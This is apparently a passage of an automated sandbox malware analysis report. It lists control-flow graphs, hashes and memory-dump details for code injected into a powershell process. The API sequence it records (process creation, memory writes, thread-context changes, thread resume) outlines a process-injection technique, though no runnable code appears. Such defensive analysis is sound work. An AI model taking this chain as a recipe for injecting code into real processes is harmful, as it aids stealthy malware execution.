72684->72685 72687 7203d90 Wow64SetThreadContext 72685->72687 72688 7203d88 Wow64SetThreadContext 72685->72688 72686 71c8865 72687->72686 72688->72686 72690 71c922f 72689->72690 72691 71c9251 72690->72691 72699 71c9b47 72690->72699 72704 71c9acb 72690->72704 72691->72650 72695 71c9218 72694->72695 72696 71c9251 72695->72696 72697 71c9acb 2 API calls 72695->72697 72698 71c9b47 2 API calls 72695->72698 72696->72650 72697->72696 72698->72696 72700 71c9b6c 72699->72700 72709 72035b5 72700->72709 72713 72035c0 72700->72713 72705 71c9ada 72704->72705 72707 72035c0 CreateProcessA 72705->72707 72708 72035b5 CreateProcessA 72705->72708 72706 71c9e65 72707->72706 72708->72706 72710 72035c0 CreateProcessA 72709->72710 72712 72037ac 72710->72712 72714 7203624 CreateProcessA 72713->72714 72716 72037ac 72714->72716 72718 7204ca8 NtResumeThread 72717->72718 72720 7204d25 72718->72720 72720->72656 72722 7204cf0 NtResumeThread 72721->72722 72724 7204d25 72722->72724 72724->72656 72726 7204670 WriteProcessMemory 72725->72726 72728 72046c7 72726->72728 72728->72661 72730 7204628 WriteProcessMemory 72729->72730 72732 72046c7 72730->72732 72732->72661 72734 7203dd5 Wow64SetThreadContext 72733->72734 72736 7203e1d 72734->72736 72736->72676 72738 7203d8e Wow64SetThreadContext 72737->72738 72739 7203cbe 72737->72739 72741 7203e1d 72738->72741 72739->72676 72741->72676 72742 75afc44 72743 75afc50 72742->72743 72744 75afc62 72743->72744 72748 6f72cb0 72743->72748 72753 6f72a58 72743->72753 72758 6f72a48 72743->72758 72749 6f72be0 72748->72749 72752 6f72cc9 72748->72752 72749->72748 72750 6f72e6e GetSystemInfo 72749->72750 72751 6f72e9e 72750->72751 72751->72744 72752->72744 72756 6f72a91 72753->72756 72754 6f72e6e GetSystemInfo 72755 6f72e9e 72754->72755 72755->72744 72756->72754 72757 6f72b66 72756->72757 72757->72744 72759 6f72a91 72758->72759 72760 6f72e6e GetSystemInfo 72759->72760 72762 6f72b66 72759->72762 72761 6f72e9e 72760->72761 72761->72744 72762->72744
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,wq$4$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-142878317
                                                                                                        • Opcode ID: 83fef78bc64f448498c621a0ec9a597afc4f0f1581e98a062500073da13fc4a6
                                                                                                        • Instruction ID: 58752a5e59c822aea5de4c7153056594a7e5d252d243583c579804ff0c2e908d
                                                                                                        • Opcode Fuzzy Hash: 83fef78bc64f448498c621a0ec9a597afc4f0f1581e98a062500073da13fc4a6
                                                                                                        • Instruction Fuzzy Hash: 11B209B4B102299FDB24CFA4C894BADB7B6BF88300F158595E505AB3A5CB70EC46DF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,wq$4$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-3730739033
                                                                                                        • Opcode ID: 5d25b62b1d760c29a4d674c1844111f1a5610d3c40996eff206d1fd038babdfb
                                                                                                        • Instruction ID: 7856dfc5f7a1080eac11251790a754b17c6df95e23d0ac1c2e02fa15bf71e73d
                                                                                                        • Opcode Fuzzy Hash: 5d25b62b1d760c29a4d674c1844111f1a5610d3c40996eff206d1fd038babdfb
                                                                                                        • Instruction Fuzzy Hash: 072219B4B10226DFDB24DF64C984BA9B7B2BF88300F158195D509AB3A5CB70ED86DF50

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3110 7228bc7-7228bd6 3112 7228be2-7228c0b 3110->3112 3113 7228ba7-7228bad 3112->3113 3114 7228c0d-7228c13 3112->3114 3115 7228bb6-7228bb7 3113->3115 3116 7228baf 3113->3116 3114->3113 3120 7228c15-7228c56 3115->3120 3123 7228bb9-7228bc5 3115->3123 3116->3115 3117 7228bc6 3116->3117 3118 7228ed7-7228f06 3116->3118 3119 7228e17-7228ec4 call 72284c8 3116->3119 3116->3120 3121 7228f0b-7228f50 3116->3121 3122 7228d5b-7228e04 call 72284c8 3116->3122 3116->3123 3124 7228c7d-7228d4a 3116->3124 3117->3110 3139 7228c68-7228c6e 3119->3139 3158 7228eca-7228ed2 3119->3158 3120->3139 3140 7228c58-7228c60 3120->3140 3141 7228f52-7228f58 3121->3141 3142 7228f5a-7228f5f 3121->3142 3122->3139 3161 7228e0a-7228e12 3122->3161 3124->3139 3165 7228d50-7228d56 3124->3165 3143 7228c70 3139->3143 3144 7228c77-7228c78 3139->3144 3140->3139 3141->3142 3146 7228f61-7228f62 3142->3146 3147 7228f64-7228fb2 3142->3147 3143->3118 3143->3119 3143->3121 3143->3122 3143->3124 3144->3118 3144->3124 3146->3147 3159 7228fb4-7228fba 3147->3159 3160 7228fbc-7228fc1 3147->3160 3158->3139 3159->3160 3162 7228fc3-7228fc4 3160->3162 3163 7228fc6-7228ff7 3160->3163 3161->3139 3162->3163 3168 7228ff9-7228fff 3163->3168 3165->3139 3169 7229001 3168->3169 3170 7229008-7229009 3168->3170 3171 72293a3-72293a4 3169->3171 3172 72290a6-72290c3 3169->3172 3173 722914b 3169->3173 3174 722920b-722920c 3169->3174 3175 7229348-7229394 3169->3175 3176 722900e-7229066 3169->3176 3177 722920e 3169->3177 3178 7229072-7229095 3169->3178 3179 72292d6-72292d7 3169->3179 3180 72291b8-72291fe 3169->3180 3181 72292d9 3169->3181 3182 7229279-72292c7 3169->3182 3183 72290fe-7229141 3169->3183 3170->3172 3170->3176 3201 72293a5 3171->3201 3188 722914c 3172->3188 3194 72290c9-72290e2 3172->3194 3173->3188 3184 722920f 3174->3184 3199 7229333-722933c 3175->3199 3219 7229396-72293a1 3175->3219 3176->3168 3216 7229068-7229070 3176->3216 3177->3184 3178->3168 3185 722909b-72290a1 3178->3185 3187 72292da 3179->3187 3200 72291a3-72291ac 3180->3200 3215 7229200-7229209 3180->3215 3181->3187 3196 7229264-722926d 3182->3196 3217 72292c9-72292d4 3182->3217 3198 72290ec-72290f2 3183->3198 3218 7229143-7229149 3183->3218 3184->3196 3185->3168 3187->3199 3188->3200 3197 72290e4-72290ea 3194->3197 3194->3198 3208 7229276-7229277 3196->3208 3209 722926f 3196->3209 3197->3198 3203 72290f4 3198->3203 3204 72290fb-72290fc 3198->3204 3205 7229345-7229346 3199->3205 3206 722933e 3199->3206 3212 72291b5-72291b6 3200->3212 3213 72291ae 3200->3213 3201->3201 3203->3171 3203->3173 3203->3174 3203->3175 3203->3177 3203->3179 3203->3180 3203->3181 3203->3182 3203->3183 3204->3173 3204->3183 3205->3175 3206->3171 3206->3175 3208->3179 3208->3182 3209->3171 3209->3175 3209->3179 3209->3181 3209->3182 3212->3177 3212->3180 3213->3171 3213->3174 3213->3175 3213->3177 3213->3179 3213->3180 3213->3181 3213->3182 3215->3200 3216->3168 3217->3196 3218->3198 3219->3199
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq$Tesq
                                                                                                        • API String ID: 0-1365298620
                                                                                                        • Opcode ID: 81fa54d30353702463aafcbe2669089320ab66b94aa84ab26f698c73763f132f
                                                                                                        • Instruction ID: 312f9cb1b318ec7292c59bae737e41f84e100ad1c69a55cfdbde58dbf0ab77ac
                                                                                                        • Opcode Fuzzy Hash: 81fa54d30353702463aafcbe2669089320ab66b94aa84ab26f698c73763f132f
                                                                                                        • Instruction Fuzzy Hash: 43120CB4E25229CFDB64CF68D845B9DB7B2FB89300F5090A6D409AB354DB70AD86CF11

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 4397 6f72a58-6f72a8f 4398 6f72ad5 4397->4398 4399 6f72a91-6f72a98 4397->4399 4402 6f72ad8-6f72b14 4398->4402 4400 6f72a9a-6f72aa7 4399->4400 4401 6f72aa9 4399->4401 4403 6f72aab-6f72aad 4400->4403 4401->4403 4408 6f72b1a-6f72b23 4402->4408 4409 6f72b98-6f72ba3 4402->4409 4406 6f72ab4-6f72ab6 4403->4406 4407 6f72aaf-6f72ab2 4403->4407 4411 6f72ac7 4406->4411 4412 6f72ab8-6f72ac5 4406->4412 4410 6f72ad3 4407->4410 4408->4409 4415 6f72b25-6f72b2b 4408->4415 4413 6f72ba5-6f72ba8 4409->4413 4414 6f72bb2-6f72bda 4409->4414 4410->4402 4416 6f72ac9-6f72acb 4411->4416 4412->4416 4413->4414 4423 6f72be0-6f72be9 4414->4423 4424 6f72cc9-6f72d48 4414->4424 4417 6f72b31-6f72b3e 4415->4417 4418 6f72e09-6f72e26 4415->4418 4416->4410 4421 6f72b40-6f72b64 4417->4421 4422 6f72b8f-6f72b96 4417->4422 4428 6f72e3d-6f72e9c GetSystemInfo 4418->4428 4429 6f72e28-6f72e39 4418->4429 4435 6f72b66-6f72b69 4421->4435 4436 6f72b8b 4421->4436 4422->4409 4422->4415 4423->4418 4426 6f72bef-6f72c1f 4423->4426 4456 6f72d92-6f72da5 4424->4456 4457 6f72d4a-6f72d90 4424->4457 4443 6f72c21-6f72c67 4426->4443 4444 6f72c69-6f72c7c 4426->4444 4437 6f72ea3-6f72eb7 4428->4437 4438 6f72e9e 4428->4438 4429->4428 4441 6f72b75-6f72b88 4435->4441 4442 6f72b6b-6f72b6e 4435->4442 4436->4422 4438->4437 4442->4441 4445 6f72c7e-6f72c85 4443->4445 4444->4445 4447 6f72c87-6f72c98 4445->4447 4448 6f72cad-6f72cc3 4445->4448 4447->4448 4452 6f72c9a-6f72ca6 4447->4452 4448->4423 4448->4424 4452->4448 4458 6f72da7-6f72dae 4456->4458 4457->4458 4459 6f72db0-6f72db6 4458->4459 4460 6f72dbd-6f72df4 4458->4460 4459->4460 4463 6f72df6-6f72e06 4460->4463 4464 6f72d8a-6f72d8d 4460->4464 4464->4456
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d73d06fdf410cd1b3fe0b92f9bae6c83f9cf7e6ca3fdc012e69dd0347a76aca
                                                                                                        • Instruction ID: 68fd85192b469153c5dee118d5a5fdedb7574355a83b79f83a27d9e3f50e44e8
                                                                                                        • Opcode Fuzzy Hash: 0d73d06fdf410cd1b3fe0b92f9bae6c83f9cf7e6ca3fdc012e69dd0347a76aca
                                                                                                        • Instruction Fuzzy Hash: 5FD11971D00619DFDB65DFA9C880A9DFBB1FF48314F24865AD814AB352DB70AA85CF80
                                                                                                        APIs
                                                                                                        • NtResumeThread.NTDLL(?,?), ref: 07204D16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 0b06a7079f8dbd15e0dec48187cb7b96812dee9946826834ff23b8ad79a47708
                                                                                                        • Instruction ID: 4e886dfe3c1ba62b774daa841f2ad041a9ff046b98ceb1df6bfa1d75e1942ec2
                                                                                                        • Opcode Fuzzy Hash: 0b06a7079f8dbd15e0dec48187cb7b96812dee9946826834ff23b8ad79a47708
                                                                                                        • Instruction Fuzzy Hash: ED2127B1D102499EDB10DFAAC485A9EFBF8EF59320F14842AD419A7240DB749945CFA1
                                                                                                        APIs
                                                                                                        • NtResumeThread.NTDLL(?,?), ref: 07204D16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 7f5873318a113ac52b53117c9e6ebb2c62a0ae2375851fe87f069f6c06997cfa
                                                                                                        • Instruction ID: f066e704de5195ecce22686eadfdfabb487f3f1370add8743227e70eaa944fd2
                                                                                                        • Opcode Fuzzy Hash: 7f5873318a113ac52b53117c9e6ebb2c62a0ae2375851fe87f069f6c06997cfa
                                                                                                        • Instruction Fuzzy Hash: 291129B1D103499FDB10DFAAC585B9EFBF8EF98324F14842AD519A7240CB74A944CFA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PHsq
                                                                                                        • API String ID: 0-3083888473
                                                                                                        • Opcode ID: a783c32746b4d0e67aab4dd133a0de1e4edeb9d0bcacfc8a251dbb33947755ff
                                                                                                        • Instruction ID: 42e734891758db714651426706453a918f12c88b19b97a1c1d2092b973f87941
                                                                                                        • Opcode Fuzzy Hash: a783c32746b4d0e67aab4dd133a0de1e4edeb9d0bcacfc8a251dbb33947755ff
                                                                                                        • Instruction Fuzzy Hash: 7AC12AB4E19259CFDB24CFA8C9867ADBBB2FB55300F1090A9D409EB394CB745985CF01
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq
                                                                                                        • API String ID: 0-136783293
                                                                                                        • Opcode ID: 2951a0360df8fea7398f23d2a220ed6578f5152e1d52280430f619cd0eaf37df
                                                                                                        • Instruction ID: 2e908c588f11c1c4186b26d9f1a9d6118415e55d6793224b10b349ee3fc3ea9b
                                                                                                        • Opcode Fuzzy Hash: 2951a0360df8fea7398f23d2a220ed6578f5152e1d52280430f619cd0eaf37df
                                                                                                        • Instruction Fuzzy Hash: 33B1F870E05219CFEB64DFA9C984BADBBF2FB89304F5480A9E409AB355D7B05985CF40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq
                                                                                                        • API String ID: 0-136783293
                                                                                                        • Opcode ID: 45bd95b47b5f9f207d5ad319e2ece1db64706920c32d1f3f993837b65fb86371
                                                                                                        • Instruction ID: 0e251704e7749e5c788d2fa76113020857d1746536a736e546bbb7db96ac7138
                                                                                                        • Opcode Fuzzy Hash: 45bd95b47b5f9f207d5ad319e2ece1db64706920c32d1f3f993837b65fb86371
                                                                                                        • Instruction Fuzzy Hash: 5CB1F870E05218CFEB54DF69D984BADBBF2FB89304F1490A9E409AB355D7B05981CF40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-2058173011
                                                                                                        • Opcode ID: 413997869943f7c449abb211e9d030727f99d8889dbcb3d1552ae54fdd6f43c3
                                                                                                        • Instruction ID: e682d7f5e7d8057e9e3bf9fe6423f1bec1129b98ccc109199c9020c14b2653a6
                                                                                                        • Opcode Fuzzy Hash: 413997869943f7c449abb211e9d030727f99d8889dbcb3d1552ae54fdd6f43c3
                                                                                                        • Instruction Fuzzy Hash: 1DC2F6B1B0424AAFDB158F69D8506EEBBE2FFC9210F18887BD5058B251DB31DD41CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-345312062
                                                                                                        • Opcode ID: 330cf21b4cb46ac9b3a0fb955a2c210cccb2b8a5d3fdd4034b6934754d44ddec
                                                                                                        • Instruction ID: deaa8e1604bd6c768c7509c30ea2db688d0a894f4a85b0a573446e66db13c049
                                                                                                        • Opcode Fuzzy Hash: 330cf21b4cb46ac9b3a0fb955a2c210cccb2b8a5d3fdd4034b6934754d44ddec
                                                                                                        • Instruction Fuzzy Hash: F822E3B1B04246AFDB258B69C8506EEBBE2BFC5210F14C47BD9458B281DF35DC42CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2860560106.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (osq$(osq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq
                                                                                                        • API String ID: 0-519119598
                                                                                                        • Opcode ID: 676e6c4f71f38c3a892ea04cb71d1131df1219bb5bb66b6ac629c419be0759e8
                                                                                                        • Instruction ID: ad143d0816146f7adf12cdffa2a0270fda4420c939c710b9cc07f8eab0f63875
                                                                                                        • Opcode Fuzzy Hash: 676e6c4f71f38c3a892ea04cb71d1131df1219bb5bb66b6ac629c419be0759e8
                                                                                                        • Instruction Fuzzy Hash: 45C227B57042499FDB25CF68C858BEABBB6FF85310F14806AE505DB292DB31DC41CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2860560106.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq$tPsq$tPsq
                                                                                                        • API String ID: 0-631490371
                                                                                                        • Opcode ID: 5165f62719290b63b02c4d2a15f7aaac4af1ca47e908eb3a76820bdb90e250d4
                                                                                                        • Instruction ID: f9f5240865c9230577eedd48dd07eef1a9f945ea084be0cba68ea8c1f8dc09a4
                                                                                                        • Opcode Fuzzy Hash: 5165f62719290b63b02c4d2a15f7aaac4af1ca47e908eb3a76820bdb90e250d4
                                                                                                        • Instruction Fuzzy Hash: FA8294B4B002198FDB24CB68C854BAEBBB2BF85314F54C4AAD5099F345DB31DD86CB91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2082 7568cff-7568d09 2084 7568d83-7568d94 2082->2084 2085 7568d0b 2082->2085 2086 7568d99-7568da9 2084->2086 2085->2084 2087 7568dae-7568dda 2086->2087 2090 7568de0-7568e03 2087->2090 2091 756aecf-756af87 2087->2091 2096 7568e09-7568e1b 2090->2096 2097 7568e24-7568e48 2096->2097 2098 7568e1d 2096->2098 2100 7568e77-7568ee4 2097->2100 2101 7568e4a-7568e6f 2097->2101 2098->2097 2099 7568eeb-7568f0f 2098->2099 2102 7568f11-7568f36 2099->2102 2103 7568f3e-7568f7b 2099->2103 2100->2099 2101->2100 2102->2103 2111 7568f82-7568f8f 2103->2111 2112 7568f95-7568fc8 2111->2112 2113 756ac2c-756ac75 2111->2113 2117 7568ff7-7569004 2112->2117 2118 7568fca-7568fef 2112->2118 2113->2096 2117->2113 2119 756900a-7569060 2117->2119 2118->2117 2119->2113 2126 7569066-75690d1 2119->2126 2133 75690d7-7569112 2126->2133 2134 75696c8-75696ec 2126->2134 2142 7569114-7569139 2133->2142 2143 7569141-756914e 2133->2143 2135 75696ee-7569713 2134->2135 2136 756971b-7569728 2134->2136 2135->2136 2136->2113 2138 756972e-756977d 2136->2138 2151 7569783-7569785 2138->2151 2152 756ac7a-756ad32 2138->2152 2142->2143 2145 7569154-756917c 2143->2145 2146 75694bc-7569505 2143->2146 2145->2146 2153 7569182-75691aa 2145->2153 2190 75695a3-75695bd 2146->2190 2156 756978b-756979d 2151->2156 2157 756ad34-756ad59 2152->2157 2158 756ad61-756ad96 2152->2158 2153->2146 2166 75691b0-7569206 2153->2166 2159 75697a6-75697ca 2156->2159 2160 756979f 2156->2160 2157->2158 2176 756ae81-756aec5 2158->2176 2177 756ad9c-756adca 2158->2177 2164 75697cc-75697f1 2159->2164 2165 75697f9-7569859 2159->2165 2160->2159 2163 7569860-7569884 2160->2163 2168 7569886-75698ab 2163->2168 2169 75698b3-75698c0 2163->2169 2164->2165 2165->2163 2166->2146 2189 756920c-75692a4 2166->2189 2168->2169 2171 75698c6-75698f4 2169->2171 2172 756abdc-756ac25 2169->2172 2171->2172 2188 75698fa-7569928 2171->2188 2172->2156 2217 756aeca 2176->2217 2177->2176 2187 756add0-756ae42 2177->2187 2226 756ae44-756ae5f 2187->2226 2227 756ae70-756ae76 2187->2227 2188->2172 2199 756992e-756995c 2188->2199 2189->2146 2228 75692aa-756933e 2189->2228 2192 75695bf-75695e4 2190->2192 2193 75695ec-7569621 2190->2193 2192->2193 2193->2113 2207 7569627-756964b 2193->2207 2199->2172 2212 7569962-7569a3f 2199->2212 2207->2113 2216 7569651-75696ad 2207->2216 2247 7569d05-7569d29 2212->2247 2248 7569a45-7569a5f 2212->2248 2240 75696c3 2216->2240 2241 75696af-75696be 2216->2241 2217->2217 2227->2176 2228->2190 2254 7569344-756935e 2228->2254 2240->2111 2240->2134 2241->2111 2250 7569d2b-7569d50 2247->2250 2251 7569d58-7569e6e 2247->2251 2252 7569a61-7569a86 2248->2252 2253 7569a8e-7569a9b 2248->2253 2250->2251 2300 7569e74-7569e8e 2251->2300 2301 756a0d1-756a0ff 2251->2301 2252->2253 2255 7569aa1-7569ae5 2253->2255 2256 7569cbc-7569d00 2253->2256 2257 7569367-756938b 2254->2257 2258 7569360 2254->2258 2255->2256 2276 7569aeb-7569b0b 2255->2276 2256->2247 2263 756938d-75693b2 2257->2263 2264 75693ba-756940b 2257->2264 2258->2257 2261 75694b7 2258->2261 2262 7569412-7569436 2258->2262 2261->2190 2262->2134 2267 756943c-7569469 2262->2267 2263->2264 2264->2262 2267->2134 2276->2256 2284 7569b11-7569b44 2276->2284 2284->2256 2291 7569b4a-7569baa 2284->2291 2291->2256 2298 7569bb0-7569c5e 2291->2298 2298->2256 2321 7569c60-7569cba 2298->2321 2306 7569e90-7569e9c 2300->2306 2307 7569eb8 2300->2307 2317 756a104-756a154 2301->2317 2309 7569ea6-7569eac 2306->2309 2310 7569e9e-7569ea4 2306->2310 2312 7569ebe-7569f0c 2307->2312 2313 7569eb6 2309->2313 2310->2313 2312->2301 2325 7569f12-7569f27 2312->2325 2313->2312 2317->2176 2321->2247 2330 7569f41-7569f76 2325->2330 2331 7569f29-7569f2f 2325->2331 2330->2301 2339 7569f7c-7569f9c 2330->2339 2333 7569f33-7569f3f 2331->2333 2334 7569f31 2331->2334 2333->2330 2334->2330 2339->2301 2341 7569fa2-756a086 2339->2341 2341->2301 2352 756a088-756a0cf 2341->2352 2352->2317
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2860560106.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq
                                                                                                        • API String ID: 0-1617174353
                                                                                                        • Opcode ID: d7d71b61a2dc8550b5e64e17f821eb1f73bdd88467ce4b19a4e17984edde781c
                                                                                                        • Instruction ID: b4545f8611ecb727719011a0eea861d464bb52f790019dc0a0bc6a414e2ea78a
                                                                                                        • Opcode Fuzzy Hash: d7d71b61a2dc8550b5e64e17f821eb1f73bdd88467ce4b19a4e17984edde781c
                                                                                                        • Instruction Fuzzy Hash: 50C261B4A002159FDB64CB58C854BAAB7B2FF84304F5481E9DA09AF345CB71ED82CF95

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2357 756a157-756a16a 2358 756a170-756a1f4 2357->2358 2359 756abdc-756ac25 2357->2359 2370 756a1f6-756a21b 2358->2370 2371 756a223-756a2a0 2358->2371 2373 75697a6-75697ca 2359->2373 2374 756979f 2359->2374 2370->2371 2394 756a2a2-756a2c7 2371->2394 2395 756a2cf-756a2dc 2371->2395 2377 75697cc-75697f1 2373->2377 2378 75697f9-7569859 2373->2378 2374->2373 2376 7569860-7569884 2374->2376 2380 7569886-75698ab 2376->2380 2381 75698b3-75698c0 2376->2381 2377->2378 2378->2376 2380->2381 2381->2359 2382 75698c6-75698f4 2381->2382 2382->2359 2390 75698fa-7569928 2382->2390 2390->2359 2396 756992e-756995c 2390->2396 2394->2395 2395->2359 2398 756a2e2-756a330 2395->2398 2396->2359 2402 7569962-7569a3f 2396->2402 2398->2359 2406 756a336-756a352 2398->2406 2421 7569d05-7569d29 2402->2421 2422 7569a45-7569a5f 2402->2422 2406->2359 2410 756a358-756a395 2406->2410 2410->2359 2416 756a39b-756a3d9 2410->2416 2416->2359 2423 756a3df-756a4a6 2416->2423 2424 7569d2b-7569d50 2421->2424 2425 7569d58-7569e6e 2421->2425 2426 7569a61-7569a86 2422->2426 2427 7569a8e-7569a9b 2422->2427 2423->2359 2454 756a4ac-756a4fc 2423->2454 2424->2425 2471 7569e74-7569e8e 2425->2471 2472 756a0d1-756a0ff 2425->2472 2426->2427 2428 7569aa1-7569ae5 2427->2428 2429 7569cbc-7569d00 2427->2429 2428->2429 2442 7569aeb-7569b0b 2428->2442 2429->2421 2442->2429 2448 7569b11-7569b44 2442->2448 2448->2429 2457 7569b4a-7569baa 2448->2457 2454->2359 2465 756a502-756a55e 2454->2465 2457->2429 2468 7569bb0-7569c5e 2457->2468 2486 756a563-756a5aa 2465->2486 2468->2429 2500 7569c60-7569cba 2468->2500 2479 7569e90-7569e9c 2471->2479 2480 7569eb8 2471->2480 2492 756a104-756a154 2472->2492 2482 7569ea6-7569eac 2479->2482 2483 7569e9e-7569ea4 2479->2483 2485 7569ebe-7569f0c 2480->2485 2487 7569eb6 2482->2487 2483->2487 2485->2472 2505 7569f12-7569f27 2485->2505 2493 756a5ac-756a5d1 2486->2493 2494 756a5d9-756a60e 2486->2494 2487->2485 2518 756ae81-756aec5 2492->2518 2493->2494 2494->2359 2502 756a614-756a638 2494->2502 2500->2421 2502->2359 2510 756a63e-756a69a 2502->2510 2512 7569f41-7569f76 2505->2512 2513 7569f29-7569f2f 2505->2513 2534 756a6bf-756a6c5 2510->2534 2535 756a69c-756a6b1 2510->2535 2512->2472 2525 7569f7c-7569f9c 2512->2525 2515 7569f33-7569f3f 2513->2515 2516 7569f31 2513->2516 2515->2512 2516->2512 2540 756aeca 2518->2540 2525->2472 2531 7569fa2-756a086 2525->2531 2531->2472 2562 756a088-756a0cf 2531->2562 2537 756a6cb-756a712 2534->2537 2535->2537 2543 756a714-756a739 2537->2543 2544 756a741-756a74e 2537->2544 2540->2540 2543->2544 2544->2359 2545 756a754-756a782 2544->2545 2545->2359 2549 756a788-756a7b6 2545->2549 2549->2359 2553 756a7bc-756a7ea 2549->2553 2553->2359 2556 